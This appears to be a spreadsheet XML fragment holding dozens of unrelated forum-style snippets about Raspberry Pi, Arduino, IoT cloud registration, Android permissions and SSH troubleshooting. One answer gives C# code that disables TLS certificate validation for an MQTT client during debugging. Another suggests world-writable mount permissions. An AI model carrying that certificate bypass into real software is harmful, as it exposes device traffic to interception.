usb 1-1.2: new full-speed USB device number 16 using dwc_otg
usb 1-1.2: New USB device found, idVendor=0483, idProduct=5740
usb 1-1.2: New USB device strings: Mfr=1, Product=2, SerialNumber=3
usb 1-1.2: Product: STM32 Virtual ComPort
usb 1-1.2: Manufacturer: STMicroelectronics
usb 1-1.2: SerialNumber: 00000000001A
cdc_acm 1-1.2:1.0 ttyACM0: USB ACM device
usb 1-1.4: new full-speed USB device number 17 using dwc_otg
usb 1-1.4: New USB device found, idVendor=0483, idProduct=5740
usb 1-1.4: New USB device strings: Mfr=1, Product=2, SerialNumber=3
usb 1-1.4: Product: STM32 Virtual ComPort
usb 1-1.4: Manufacturer: STMicroelectronics
usb 1-1.4: SerialNumber: 00000000001A
cdc_acm 1-1.4:1.0 ttyACM1: USB ACM device
I am using node v0.12.7 and npm v2.11.3.</t>
  </si>
  <si>
    <t>Strange thing I've also noticed, that overnight, my router appended another IP address to my pi for some reason (despite that my IP lease time is set to forever on my wifi router), but I have no clue how this could affect my SSH access (maybe someone has some idea...?).</t>
  </si>
  <si>
    <t>I'm trying to do:    
I've added all required permissions (as I think):    
Please note that Android things does not support the runtime permissions regardless of it is running based on Android 7.0
And what I am getting in the logs:    
java.lang.SecurityException: Need ACCESS_COARSE_LOCATION or ACCESS_FINE_LOCATION permission to get scan results
As per documentation, It should be able to start scanning having all that permissions, but for some reason it does not want to.</t>
  </si>
  <si>
    <t>I wrote this API : 
https://github.com/prp-e/iot-api-temp-humid 
and when I tested it, I used this command : 
and each time I wanted to check the data in the "Enviroment" table, I use 
I need the cookies to be stored somewhere, or regenerate each time ESP8266 sends data to the API.</t>
  </si>
  <si>
    <t>I know on the forums, people are talking about putting root partitions on SD, user partitions on USB drives, and of course it will probably make a difference to get a fast (class 6 or better) SD card.</t>
  </si>
  <si>
    <t>Please note that, int this step you need to reacquire the ETag because it has been refreshed in last step:
az iot hub certificate verify --hub-name &lt;azure-iot-hub-name&gt; --name &lt;certificate name&gt; --path &lt;erification certificate file&gt; --etag &lt;ETag&gt;
In the end, the certificate will be verified.In addition you can get more introductions about Azure CLI Command from here(https://docs.microsoft.com/en-us/cli/azure/iot/hub?view=azure-cli-latest).</t>
  </si>
  <si>
    <t>You can authorize cards with a web interface and set things like time settings there.</t>
  </si>
  <si>
    <t>How I wrote in the title, my 4gb microSD card of unknown brand has became "write protected" after trying to install Raspbian by NOOBS on RaspberryPi B+.</t>
  </si>
  <si>
    <t>I can successfully communicate with IoT in quickstart, but after I modify the code to include specific credentials for my registered device,  I get an "unsuccessful connection".</t>
  </si>
  <si>
    <t>Internet works fine when plugged into the cable modem thru the Ethernet cable.</t>
  </si>
  <si>
    <t>I have read it with different phones and always I see that the ID is 
I've made a program with Arduino and Adafruit's PN532 shield and I have that response too, in ATQB, the PUPI appears like 0x00000000, but when I read the ISO 14443-3 I read this:
A Pseudo-Unique Identifier (PUPI) is used to differenciate PICCs
  during anticollision.</t>
  </si>
  <si>
    <t>However, that will make the GSM lose contact with the network, to re-establish contact again some time later when the device wakes up.</t>
  </si>
  <si>
    <t>i did the codes by referring to some guides and other people posts so please point out my mistake or any necessary codes that i ve written.</t>
  </si>
  <si>
    <t>There is no mention of the websocket usage(tutorials/guide) except normal tcp connection(which i was successfull at getting conected).</t>
  </si>
  <si>
    <t>I'm making an alarm system, for this I have a switch (to activate and deactivate the alarm) and a contact in a door.</t>
  </si>
  <si>
    <t>But at the end of the installation, when the raspberry reboots, i have no VNC, neither ssh or telnet server and at this time i need to plug an HDMI TV, mouse and keyboard.</t>
  </si>
  <si>
    <t>IP address assigned to ethernet shield is 192.x.x.x
while the server is 10.x.x.x
192 servers can ping to my 10 series servers but the ethernet wont connect to my server.</t>
  </si>
  <si>
    <t>Is there something I need to do so that when I click a link pointing to one of the Raspberry Pis, my session from the central login will be saved and theres no need for me to log in again?</t>
  </si>
  <si>
    <t>I have a very weak understanding of the Flash Security Policy stuff for the socket connections..</t>
  </si>
  <si>
    <t>I tried to register the new (pi3) device as LIBRARY and SERVICE both, using hotword or pushtotalk but the device is show in google home app as "offline device" and through assistant app it write me it can't control the device remotely.</t>
  </si>
  <si>
    <t>I started to read up on this..  and read about the security policy that the Flash Player needs to allows this connection.</t>
  </si>
  <si>
    <t>Edit - Though if I do 
"C:\Program Files\Microsoft SDKs\Windows\v7.0A\Bin\signtool" verify /v /pa myfile.cat
...I get "Successfully verified"</t>
  </si>
  <si>
    <t>I have been playing with WiFi developement &amp; keep running into the same problem, my Android device doesnt detect its peer group even though it happily connects to the internet.</t>
  </si>
  <si>
    <t>I am trying to create an agent credentials which is able to auto activate newly created user accounts.</t>
  </si>
  <si>
    <t>That GPU bootloader is undocumented as far as we are concerned, it brings up the chip to a point, and then loads start.elf another GPU program.</t>
  </si>
  <si>
    <t>Huamao doesn't have old versions of the firmware available for download and AFIK there is no way to backup your current firmware version.</t>
  </si>
  <si>
    <t>In case you haven't done so already I strongly suggest to upgrade your firmware to a recent version.</t>
  </si>
  <si>
    <t>If you are using a gateway, devices can be auto registered:
look for "Gateway auto-registration"
Here are some other links that may be helpful.</t>
  </si>
  <si>
    <t>For one board it gave messages like
But for another board I also got these messages "can't open device - access denied".</t>
  </si>
  <si>
    <t>Whenever I tried to download, the Arduino IDE started reporting Unknown USB Device.</t>
  </si>
  <si>
    <t>Be sure you have the right API credentials and update the ibmiot node choosing API Key from the authentication drop down box and supplying the API Key credentials for your service.</t>
  </si>
  <si>
    <t>from oauth2client.client import GoogleCredentials
...
credentials = GoogleCredentials.get_application_default()
pubsub = discovery.build('pubsub', 'v1', credentials=credentials)
...</t>
  </si>
  <si>
    <t>Make sure to use a key that is packaged in PKCS8 when opening credentials on Android (Java).</t>
  </si>
  <si>
    <t>I needed register the beacon to make function OK nearby notification when i use PyBeacon into a RPI 3+ is activated with the beacon_number advertising.</t>
  </si>
  <si>
    <t>You can use the commands
and
Diskpart
List volume
To figure out the right guid for your need (or you can protect both the boot partition and the system partition).</t>
  </si>
  <si>
    <t>In short:
Get clang binaries (sudo apt-get install clang).. or download and
build (read instructions here)
Mount your raspberry rootfs (it
may be the real rootfs mounted via sshfs, or an image).</t>
  </si>
  <si>
    <t>Facebook Graph API v2.3 is now available to use, adding new login permissions, a new debug mode for developers and updates to Real-time Updates.</t>
  </si>
  <si>
    <t>The Nuget Credential Provider is used to provide credentials for pushing nuget packages into Azure</t>
  </si>
  <si>
    <t>StampedLock in Java also provides method to upgrade read lock to write lock which is not there in ReentrantReadWriteLock in Java.</t>
  </si>
  <si>
    <t>Contact information is stored in a three-tier data model:
Contacts, Raw Contacts and Data.</t>
  </si>
  <si>
    <t>It is designed to run on removable and write-protected media such as USB Sticks or CD-ROMs (it can run standalone web applications from a CD-ROM).</t>
  </si>
  <si>
    <t>Hi everyone,
I'm Dan Dascalescu and I believe in accountability, hence my real-life picture, bio and contact information are included in my profile.</t>
  </si>
  <si>
    <t>I have tried:
checking ports
reinstalling drivers
tryed other computer
updating java
reseting
different boards in arduino IDE
restarting computer
safe mode
Different USB holes
Different USB cables</t>
  </si>
  <si>
    <t>As far as I can see even when using Firebase to synchronise state and pass messages to the in-home system (via the Android Things device) I still need to implement a custom OAuth server and have no idea how to do that so wonder if there is a platform that might be able to do both sides of it (OAuth server, and managing state) and makes it relatively simple?</t>
  </si>
  <si>
    <t>There are at least three things you can do:
(1) Give pi:pi access to the entire /media/USBHDD1 mount:
mount -o remount,gid=&lt;pi's gid&gt;,uid=&lt;pi's uid&gt; /media/USBHDD1
To determine pi's uid:
cat /etc/passwd |grep pi
To determine pi's gid:
cat /etc/group |grep pi
(2) Give everyone access to /media/USBHDD1 by changing the umask and dmask (not recommended):
mount -o remount,umask=000,dmask=000 /media/USBHDD1
(3) Change the partition to a different file system.</t>
  </si>
  <si>
    <t>Original problem (non-)reproduction
I set up a Raspberry Pi using the Raspbian OS (no GUI) with exactly the same libraries as the OP (all done with sudo for speed...)
You then have to register for a Flickr account, create a (non-commercial) app and set up the API keys etc - instructions for app creation here and api key acquisition here or, via the Python wrapper, here.</t>
  </si>
  <si>
    <t>The Certificates snap-in can be used to configure certificate enrollment policy settings for individual client computers unless the Group Policy setting is configured to disable user-configured enrollment policy.</t>
  </si>
  <si>
    <t>I tried a few more USB cables and on the 3rd cable the "Programming" LED stopped flashing and the device was recognised by Windows.</t>
  </si>
  <si>
    <t>You don't need to run the script every time with sudo as suggested in the comments but you need to make sure that you have read/write permissions for .</t>
  </si>
  <si>
    <t>It's greyed out in my IDE and I have tried a lot of things like, booting to BIOS and changing the settings to auto, to looking in for any hidden devices in the device manager window.</t>
  </si>
  <si>
    <t>But as shown in video, when the app started from phone, it needs a SSH connection (showed at 0.25 in the video).</t>
  </si>
  <si>
    <t>I have done lots of searching and I can't find any good tutorials on how to upgrade the wifi shield firmware on a windows computer.</t>
  </si>
  <si>
    <t>I did one step more which is, I will have an UI for RPi3, when I connect the RPi3 to a monitor, I can have an option to "reset" the device, so it will "delete" and "unregister" itself from Azure IoT Hub and re-launch the registration process again.</t>
  </si>
  <si>
    <t>i've been struggling lately with integrating Rasperry Pi and IBM Presence Insight
for wifi proximity detection
the official documentation describes raspberry pi as possible Wifi Proximity sensor, but there is no available documentation
someone tried it before ?</t>
  </si>
  <si>
    <t>Parts adapted from Pat Brenner's Spy++ Internals posting on the Visual C++ Team Blog, and the MSDN documentation on Spy++.</t>
  </si>
  <si>
    <t>I've started with no problems on Raspberry Pi2 but switching on Pi3 i found that:
If i connect to my "BLE Pi3" i can interact with the device only for 2-3 seconds, then i get disconnected (working on Pi2)
If i try to read/write characteristics i receive a permissions error and i can't do anything (working</t>
  </si>
  <si>
    <t>You will have to be more careful when using a Pipe as the data in a pipe may become corrupted if two processes (or threads) try to read from or write to the same end of the pipe at the same time.</t>
  </si>
  <si>
    <t>I want to have a callback function be called when a keypress event is detected, to change some state, but all available methods I've found so far (ie reading from ) seem to be blocking.</t>
  </si>
  <si>
    <t>I am following the steps to register a device in AWS-IoT.</t>
  </si>
  <si>
    <t>You need to connect the ethernet cable from the Pi3 to your router aka to the local network (not into your computer directly)
The follow the steps from the docs here and setup wifi to avoid further cable issues.</t>
  </si>
  <si>
    <t>try removing the package called "modemmanager"
for ubuntu "sudo apt autoremove modemmanager"
IMPORTANT:
if you have already atmepted to upload code to the pro micro multiple times, chances are that the bootloader on the pro micro got corrupted.</t>
  </si>
  <si>
    <t>It's working great but I don't know if I need a BT 4.0 capable device, or I can detect iBeacons with an older BT 2.0 dongle.</t>
  </si>
  <si>
    <t>I am trying to send some data to my webpage which is secured(HTTPS) from my NodeMCU, but no data is shown on the webpage.</t>
  </si>
  <si>
    <t>I have the following Arduino code I'm using with an ESP32:
This is the relevant code for loading a file and setting the WiFiClientSecure's CA certificate.</t>
  </si>
  <si>
    <t>If this was the problem, then you should give read and write permissions only to the user that runs smb.</t>
  </si>
  <si>
    <t>Otherwise a hacker could load system files from the web server and that is very dangerous.</t>
  </si>
  <si>
    <t>Finally, that registered GPIO device is what provides GPIOs shown in /sys/kernel/debug/gpio.</t>
  </si>
  <si>
    <t>Firstly, are you capable of flashing new firmware to the ESP?</t>
  </si>
  <si>
    <t>Now instead of having user input credentials every single time, it will try to connect first.</t>
  </si>
  <si>
    <t>I've started a new project based on the Secret Knock Detecting Door Lock by Steve Hoefer on Grathio and I'd like to implement the following: 
(http://grathio.com/2009/11/secret_knock_detecting_door_lock/)
(http://grathio.com/assets/secret_knock_detector.pde)
Implementation
If the global value equals 0 and the valid knock patter is true then flash a yellow LED 4 times using millis rather than delay so that it can still 'listen'.</t>
  </si>
  <si>
    <t>I'm trying to Kernel Debug Raspberry PI3 using Bus Pirate, I've followed the instructions to connect them, and also the steps from 
 (https://developer.microsoft.com/en-us/windows/iot/docs/Windbg.htm)
However everytime I run the following command 
but once I restart I get "waiting to reconnect..." and nothing happens?</t>
  </si>
  <si>
    <t>If all your devices are on the same network, the nice thing about using VPN to get in is that you can connect to OpenVPN on your cell phone and then connect via SSH with an app like Termius on IOS, or any other SSH capable IOS App to your IoT device, and get things done quickly; like rebooting IoT devices, setting permissions, checking logs on the go.</t>
  </si>
  <si>
    <t>Following the specification for limited input devices works like a charm, but... only to access Google APIs, GAE app ignores tokens obtained by limited input flow, and forces me to follow the standard OAuth.</t>
  </si>
  <si>
    <t>[following sections were edited] 
I followed the tutorial here: http://crunchtools.com/vsftpd-ssl/.</t>
  </si>
  <si>
    <t>I have followed multiple tutorials on how to set up the authentication but I can't get it to work et can't figure out why.</t>
  </si>
  <si>
    <t>To be more specific the steps that I am trying to achieve are the following:
1) Register my CA with AWS IoT.</t>
  </si>
  <si>
    <t>So the first obvious step is to write code for object detection.</t>
  </si>
  <si>
    <t>If you want to do this I would suggest following this steps:
Create a linux partition with the same os as in the pi (for example raspbian and debian) and name the username (in linux) "pi" and the password "raspberry".</t>
  </si>
  <si>
    <t>You need to do one of the following to give that permission to your app:
Reboot the device after the first installation.</t>
  </si>
  <si>
    <t>This gives you the obvious place from where to start foreground applications: in that login script.</t>
  </si>
  <si>
    <t>Please follow the steps outlined here: 
https://docs.microsoft.com/en-us/azure/iot-dps/tutorial-net-provision-device-to-hub
to first create an Enrollment in DPS for this device using X.509 (no need to use EnrollmentGroup for a single device).</t>
  </si>
  <si>
    <t>On a quick research from the official documentation of Raspberry pi
It is a default authentication key which you were looking at those forums.</t>
  </si>
  <si>
    <t>Paul Graham, a renowned venture capitalist, has written several essays, like one on the meaning of hacker, one on the personification of hackers and one on comparing hackers to artists.</t>
  </si>
  <si>
    <t>I was trying to install OpenCV on my raspberry pi 3 and was following the tutorial:
https://www.learnopencv.com/install-opencv-4-on-raspberry-pi/
Everything was going well until the command:
After I executed the above command I got the following error(last part of the error):
request.exceptions.SSLError: ("bad handshake: Error([('SSL routines', 'tls_process_server_certificate','certificate verify failed')],)",)
I have been searching for a solution for 2-3 days now.</t>
  </si>
  <si>
    <t>You can try:
SSH to raspberry Pi with given credentials (if both devices are connected to the network... but that may not always be doable)
Setup web API/app on RPi and use it via browser on Android (like https://github.com/NeonHorizon/berryio )
Use Bluetooth UART: Adafruit has a full blown Bluetooth UART board, and Chinese make many slave (or master) UART serial boards.</t>
  </si>
  <si>
    <t>I have successfully patched/built/installed/run the RT kernel with PREEPMT_RT configured on the RPi.</t>
  </si>
  <si>
    <t>I have tried the following commands:
Every time it's giving Access Denied.Please tell me where I am going wrong.</t>
  </si>
  <si>
    <t>You should be able to follow these instructions through the web to enable certain permissions in order to use the Assistant.</t>
  </si>
  <si>
    <t>The project mentioned by @Harshil Makwana forces you to create an IAM user and then put the credentials on the device.</t>
  </si>
  <si>
    <t>http://www.codehelp.co.uk/html/code10.html
notice if you go to -&gt; sketch it has an option for verify/compile
sending commands from a language like ruby or any other for that matter are possible through UART - http://en.wikipedia.org/wiki/Universal_asynchronous_receiver/transmitter
or  any other communication protocol either over a physical ethernet/ usb cable or wirelessly through bluetooth, wifi, etc.</t>
  </si>
  <si>
    <t>And all of the mentioned two variants of data/file storage within Android involves various other techniques related to Permissions within the Android System which the developers has to write code in order to handle it smoothly without interrupting the end user actions.</t>
  </si>
  <si>
    <t>I wrote some code to save username/password credentials that are entered from a html page in a file.</t>
  </si>
  <si>
    <t>I have downloaded all relevant libraries for yowsup and completed the 2 step registration process.</t>
  </si>
  <si>
    <t>These devices have RFID chips inside them that store information about device and I'm working with Xamarin.Forms project that would allow android/iOS users to get this information.</t>
  </si>
  <si>
    <t>username : null;
        }
        else if (typeof settings === 'object') {
            //ajaxDigest(url, settings, username, password)
            s = settings ?</t>
  </si>
  <si>
    <t>To compile the code:
Why does my RPi3 not detect iOS devices?Is there any specific steps to be taken to make my iOS device discoverable to the RPi3?Is there any better example for me to follow?</t>
  </si>
  <si>
    <t>4) Correct.Just used a bit field to verify and wrote it out on paper to verify.</t>
  </si>
  <si>
    <t>The core operating system is housed in read-only partitions on the file system, so there is no risk of corrupting the OS from a failed in-flight write.</t>
  </si>
  <si>
    <t>no networking
Ubuntu 16.04, QEMU 2.5.0, Raspbian 2016-05-27, modified kernel
This method uses -M versatilepb which is present on the QEMU 2.5.0 of Ubuntu 16.04.</t>
  </si>
  <si>
    <t>Make sure that your device was registered with the correct credentials, region, and Cloud project.</t>
  </si>
  <si>
    <t>However, that is limited to whatever settings you gave the "app" in the Dropbox settings to get your access token.</t>
  </si>
  <si>
    <t>The following operations are supported:
download
upload
in-place manipulation</t>
  </si>
  <si>
    <t>I have tried even with service mqtt with no luck, however this shouldn't matter, the mDNS stuff should work regardless what's exposed from the Raspberry Pi (HTTP server, MQTT, FTP whatever...)
Checking here https://github.com/espressif/arduino-esp32/blob/master/libraries/ESPmDNS/src/ESPmDNS.h#L98 there is not that much information about this "service" and "proto", and I am not that much familiar with low-level C/C++, what are these things?</t>
  </si>
  <si>
    <t>The producer does not have to be running at the time the consumer
consumes the message, nor does the consumer need to be running at
the time the message is sent,
Every message successfully processed is acknowledged by the consumer(you can configure it)</t>
  </si>
  <si>
    <t>Thank you in advance
Things I have already done:
I have created a thing in AWS
I have also created certificate and that kind of stuff.</t>
  </si>
  <si>
    <t>Just read this thread 
What I am still asking myself though is whether the IoT Hub does detect that there are multiple active connections that use the same deviceid and credentials?</t>
  </si>
  <si>
    <t>2) I am generating logs in my code using logging library, will I be able to write logs if my SD card/code is write/read protected.</t>
  </si>
  <si>
    <t>I am trying to get a specific device (details below) to register/connect via usb/serial (FTDI) on a Raspberry Pi 3 (with Windows IOT Core v15063).</t>
  </si>
  <si>
    <t>It successfully connects to my WiFi
I verify it is connected with this example script:
Results:
I verify I get an IP using this example script.</t>
  </si>
  <si>
    <t>Problem: It appears that the example is for just 1 device to connect to AWS IoT, which I concluded from the hardcoded IoT Thing certificate being used, such as
If this conclusion is correct that  is configured for only 1 Thing, then what modifications can we make such that more than 1 Thing can be used?</t>
  </si>
  <si>
    <t>Alternatively, running the credentials flow on the Android phone browser, and then fetching the results from that.</t>
  </si>
  <si>
    <t>I have tried several options in trying to figure out what is wrong from new drivers to registering the driver to changing permissions on my MySQL database.</t>
  </si>
  <si>
    <t>Is there any way I could get single certificate that allows my python script to publish and subscribe to multiple things by providing things ARN end-points ?</t>
  </si>
  <si>
    <t>I actually want to connect rpi to my laptop without using any cables at all.So, I have written the raspbian image to a sd card..then added ssh and wpa_supplicant file with my wifi ssid and password in it.</t>
  </si>
  <si>
    <t>My Thing's Policy has BOTH entries for Authorization for my Hub-Things Connection as well as for my Java Client (Things Client ID).</t>
  </si>
  <si>
    <t>If you have complete access to server, my suggestion is to use TCP Socket direcly (Client class on arduino with write e read, like using the Serial), if you can't then you have to "tunnel" your PROTOCOL over an accepted protocol on the server.</t>
  </si>
  <si>
    <t>The device name is sent as part of a BLE scan response, and not part of the beacon advertisement.</t>
  </si>
  <si>
    <t>It allows the developer to create a device (a microcontroller device like an Arduino or atmega on another board) which will be able to connect to a network via WiFi; either by connecting to an existing Access Point or by establishing a new Access Point.</t>
  </si>
  <si>
    <t>One thing to mention is that in the read me of the  library, it says you can only define up to 6 alarms only, but that can be changed inside the library by dtNBR_ALARMS field.</t>
  </si>
  <si>
    <t>So if I understand correctly it would appear that there is some particular settings on that laptop preventing you from using SSH if that is the only thing you are changing?</t>
  </si>
  <si>
    <t>After reading this GitHub issue, it looks like I need to get temporary credentials either through STS, Cognito, or some other service and refresh the client with these credentials periodically before they expire.</t>
  </si>
  <si>
    <t>Dangerous permissions have to be explicitly granted by either the Android Things console or the developer tools.</t>
  </si>
  <si>
    <t>The flow is as follows: 
In order to connect a device to an IoT Central application without first being registered you need to generate suitable credentials, and configure the devices.</t>
  </si>
  <si>
    <t>It allows you to spy/browse the visual tree of a running WPF application (without the need for a debugger)  and change properties ... amongst other things.</t>
  </si>
  <si>
    <t>The Google Webmaster Tools API allows developers to submit, read, and update data in Google Webmaster Tools for verified websites.</t>
  </si>
  <si>
    <t>This tag refers to Android runtime permissions introduced with Android 6.0 Marshmallow (API level 23).</t>
  </si>
  <si>
    <t>Examples of web technologies include the Web Cryptography API [webcryptoapi], Battery Status API, Permission API, etc.</t>
  </si>
  <si>
    <t>Questions regarding the use of the Fingerprint Authentication API, introduced in Android 6.0 Marshmallow (API level 23).</t>
  </si>
  <si>
    <t>From the Incognito mode, FAQ page, in Incognito mode:
Webpages that you open and files downloaded while you are incognito aren't recorded in your browsing and download histories.</t>
  </si>
  <si>
    <t>Developers using Vimeo should have a basic understanding of the various account types available on Vimeo, as well as video privacy settings.</t>
  </si>
  <si>
    <t xml:space="preserve">
https://github.com/google/eddystone
https://developers.google.com/beacons
Its cross-platform, supporting Android, iOS or any platform that supports BLE beacons.</t>
  </si>
  <si>
    <t>How to solve the A potentially dangerous Request.Form value was detected from the client exception?</t>
  </si>
  <si>
    <t>Because life is too short to spend time hand-writing fake functions for testing.</t>
  </si>
  <si>
    <t xml:space="preserve">
Project home
NuGet package
The Crypto Workshop Guide for Java Cryptography and Bouncy Castle
BouncyCastle.Crypto feature list:
Generation and parsing of PKCS#12 files.</t>
  </si>
  <si>
    <t>This can be verified with :
-rw-r--r-- 1 me 11 2013-01-25 09:53 x.sh
Permission flags can also be specified as letters (r - read, w - write, x - execute), using + or - sign to turn them on or off, for all users.</t>
  </si>
  <si>
    <t>$ hciconfig
Scan your bluetooth Ipega device:
$ hcitool scan
Pair your device using the MAC number scanned previously:
$ sudo bluez-simple-agent hci# xx:xx:xx:xx:xx:xx
After pairing connect your controller:
$ sudo bluez-test-input connect xx:xx:xx:xx:xx:xx
You will need to trust this device to allow auto-connection after a reboot:
$ sudo bluez-test-device trusted xx:xx:xx:xx:xx:xx yes
2) Check if your controller is in the input devices and responds correctly:
Verify there is an input file in e.g.</t>
  </si>
  <si>
    <t>Exception tree:
net.schmizz.sshj.transport.TransportException
 net.schmizz.sshj.common.SSHException
  net.schmizz.sshj.common.SSHRuntimeException
   java.security.GeneralSecurityException: java.security.NoSuchAlgorithmException: KeyFactory ECDSA implementation not found
    java.security.NoSuchAlgorithmException: KeyFactory ECDSA implementation not found
Other system info:
SSHJ library   : v0.10.0
Android device : Galaxy Note 3 running Android 4.4.2
I used the maven dependency support in Android Studio to bring in the SSHJ JAR and it pulled in the following three libraries in addition to the SSHJ v0.10.0 jar...
bouncy castle...
  bcpkix-jdk15on-1.50.jar
  bcprov-jdk15on-1.50.jar
logging....
  slf4j-api-1.7.7.jar
Don't have a clue where to start with this exception ... any suggestions appreciated!</t>
  </si>
  <si>
    <t>I have found an open-source project that contains SSH and SFTP between other protocols (OpenSSH), but I don't know how to implement it neither in Android nor in Raspbian.</t>
  </si>
  <si>
    <t>Snowboy is a customized hotword and wake word detection toolkit that recognizes your voice, runs in real time and on Raspberry Pi.</t>
  </si>
  <si>
    <t>With the same script I successfully logged to GMAIL with AUTH=PLAIN , but on Exchange it failed and give following error:
NO AUTHENTICATE failed
I would expect the script to login to Exchange mail as with Gmail, especially given 
I use the same auth method which both servers are capable of using.</t>
  </si>
  <si>
    <t>"Mousing" over actionable content gives the user a real-time preview (subject to security constraints) that can be factored in decision making.</t>
  </si>
  <si>
    <t>WooCommerce REST API is fully integrated with the WordPress REST API since WC version 2.6+, allows WC data to be created, read, updated, and deleted using requests in JSON format and using **WordPress REST API** Authentication methods and standard HTTP verbs</t>
  </si>
  <si>
    <t>The following queries:
I have a loginData.settings in my Visual Studio project with the strings: username, password &amp; ipString which each has a textbox assigned to them that saves the info.</t>
  </si>
  <si>
    <t>Each node of the cluster can accept requests, data is placed on partitions based on a consistent hashing algorithm, and quorum protocols are for read/write operations.</t>
  </si>
  <si>
    <t>(cv3) pi@raspberrypi:~ $ pip install --index-url=https://download.qt.io/official_releases/QtForPython/ pyside2 --trusted-host download.qt.io
Looking in indexes: https://download.qt.io/official_releases/QtForPython/, https://www.piwheels.org/simple
Collecting pyside2
Could not find a version that satisfies the requirement pyside2 (from versions: )
No matching distribution found for pyside2
Then I followed the instructions on the official package site https://pypi.org/project/PySide2/.</t>
  </si>
  <si>
    <t>I've found this: Can RaspberryPi with BLE Dongle detect iBeacons?</t>
  </si>
  <si>
    <t>at the boot Partition, next time you boot the Raspberry SSH is enable.</t>
  </si>
  <si>
    <t>Some more information follows:
All USB connections are secure
The RX LED flashes briefly after each "attempt"
All drivers are up to date and installed
In Device Manager, my Arduino is shown as "Arduino Uno (COM3)".</t>
  </si>
  <si>
    <t>I'm trying to figure out, what and how can get as unique identification number or any other kind of ID equivalent from particular Arduino Uno micro-controller from C# desktop application with serial port data
In case of Uno, I have COM3 open:
But I'm not sure, how to read such data as ID of chip, for example with EEPROM Get :
and C#:
private void button1_Click(object sender, EventArgs e)
{
    textBox1.Text = myport.ReadExisting();
}
I get some completely misunderstood result:
Read float from EEPROM: ovf
Read custom object from EEPROM: 
ovf
95
_^^]]]\\\\fedc
What must be the output variable to get unique id from particular micro-controller:
  Serial.println(customVar.field2);
  Serial.println(customVar.name);</t>
  </si>
  <si>
    <t>Assurance can be defined (in computer and data terms) as taking the necessary precautions and steps to ensure a user' data can be obtained at all times (availability), AND / OR that it has not been modified by an un-autherized source (in transit or locally on device, integrity).</t>
  </si>
  <si>
    <t>your device/gateway is doomed...)
Once such a thing (accident...) has happened, all your other registered devices, although they can be successfully connected to Bluemix, give the error message I have described in my question above (including the status in the Node-RED console, forever reporting .</t>
  </si>
  <si>
    <t>You have to give a useragent that follows the rules, everything else is handled by PRAW so you neednt worry about violating them.</t>
  </si>
  <si>
    <t>In both cases of device registration at manufacture, you can register multiple certificates per-device so that you can "change your password" effectively over time by rotating through the certificates associated to the device by expiring certificates or can revoke suspicious certificates, using additional on-device credentials.</t>
  </si>
  <si>
    <t>the package structure is like this:
the crc16 is verified by the following function:
I don't understand how this works.</t>
  </si>
  <si>
    <t>I found this tutorial: https://help.ubuntu.com/community/Network802.1xAuthentication and did the steps.</t>
  </si>
  <si>
    <t>Last login: Sun Sep 17 23:16:57 2017 from peces.local
pi@raspberrypi:~ $
For the latter, I don't understand so well the ssh command's -f option 
(this flag implies the -n flag).</t>
  </si>
  <si>
    <t>Please verify the correct remote authentication mode is specified in
  the project debug settings.</t>
  </si>
  <si>
    <t>I have run the following terminal command correctly:
However I am getting the following credential errors:</t>
  </si>
  <si>
    <t>You might need to setup your HM10 as a BLE central device before you can start scanning for Beacons.</t>
  </si>
  <si>
    <t>Once you passed the credentials save it in sharedpref in things app and reuse as needed.</t>
  </si>
  <si>
    <t>ie I got 8-9 good reads followed by 8-9 corrupted reads repeatedly.</t>
  </si>
  <si>
    <t>you can use  to get a shell on the android ( https://android.stackexchange.com/questions/118738/how-to-ssh-into-an-unrooted-android-device-using-sshdroid-from-a-linux-computer )
calls are managed on android by the phone service that is an android system service ( https://anatomyofandroid.com/2013/10/03/system-services/, https://developer.android.com/guide/components/services.html )
if you have the shell ( and if you have root ) you can invoke calls like
source : https://davanum.wordpress.com/2007/12/12/android-calldial-from-the-adb-shell-command-line/
i
for mirroring the android screen you can use a VNC server on the android and a VNC client on the Rpi</t>
  </si>
  <si>
    <t>By the way, with the following settings, if I write my "outside" ip as url, I get prompted with a user\password form.</t>
  </si>
  <si>
    <t>I am registering an irq at 0 for my board in  rpi kernel using device tree then i didnt get any error like "Unexpected IRQ trap at 00", but when i moved to 3.19.y rpi kernel doing the same giving the above error.</t>
  </si>
  <si>
    <t>However, when trying to read or write from the device I got a permission denied error, so I followed this post to solve that problem /dev/i2c-x permission.</t>
  </si>
  <si>
    <t>I found that device pool id is required to get shadow details using Android SDK with CognitoCachingCredentialsProvider.</t>
  </si>
  <si>
    <t>Now I tried to run helloWorld app to publish data to IBM watson cloud device which was already registred successfully with following command but it retured with error code as -82 which I am unable to find error code list of IBM watson website doc.</t>
  </si>
  <si>
    <t>Three important things to notice, using shell=True might be bad, unsafe and tricky.</t>
  </si>
  <si>
    <t>You can use the following snippet to skip cert validation in your module:
var mqttSetting = new MqttTransportSettings(TransportType.Mqtt_Tcp_Only);
mqttSetting.RemoteCertificateValidationCallback =
    (sender, certificate, chain, sslPolicyErrors) =&gt; true;
ITransportSettings[] settings = { mqttSetting };
DeviceClient deviceClient =
     DeviceClient.CreateFromConnectionString(connectionString, settings);
After this you should be able to debug your module from VS.</t>
  </si>
  <si>
    <t>When enabling Bluetooth in Android Things, do it programatically with:
The REQUEST_ENABLE_INTENT may not work since your Raspberry might not be connected to a screen and won't show the permission dialog.</t>
  </si>
  <si>
    <t>the following fingerprint works at this point of time:
See https://github.com/FirebaseExtended/firebase-arduino/issues/328</t>
  </si>
  <si>
    <t>Newbies usually ignore stuff like shielding,length and placement of cables, EMC or RF noise,power/digital/blocking grounds etc.</t>
  </si>
  <si>
    <t>GPRS, WAP, MMS, 3G, 4G
I have successfully comm'ed with httpbin.org using HTTP POST (as opposed to HTTPS, my chip doesn't support it) without the proxy settings included.</t>
  </si>
  <si>
    <t>Read committed is the most basic isolation level, which ensures that transactions only read data that is already saved.</t>
  </si>
  <si>
    <t>C# side
I tried storing the username in a char array and send to arduino one by one but the Serial.Write() gives error if I don't give a string to it.</t>
  </si>
  <si>
    <t>Is there some way to enable lock bits by compiling the sketch into Hex and then uploading it with avrdude ?</t>
  </si>
  <si>
    <t>I have debugged each step of the code and nothing seems abnormal, unfortunately I cannot the code as
1) it's far too long...
2) it's confidential... 
:(
I understand without code I cannot get a complete solution but what are those characters!</t>
  </si>
  <si>
    <t>If you haven't yet changed the default password, do the following:
sudo passwd
Now its time to see our partion table
cat /proc/partitions
For me, the disk is sda1.</t>
  </si>
  <si>
    <t>So, if you have e.g 100 things in the database that have been encrypted by your secure, uncloneable crypto hardware, and it shows it has only been used 100 times, you're fine.</t>
  </si>
  <si>
    <t>The obvious case would be to either create a limited API key or use an API key you have already created as you are attempting.</t>
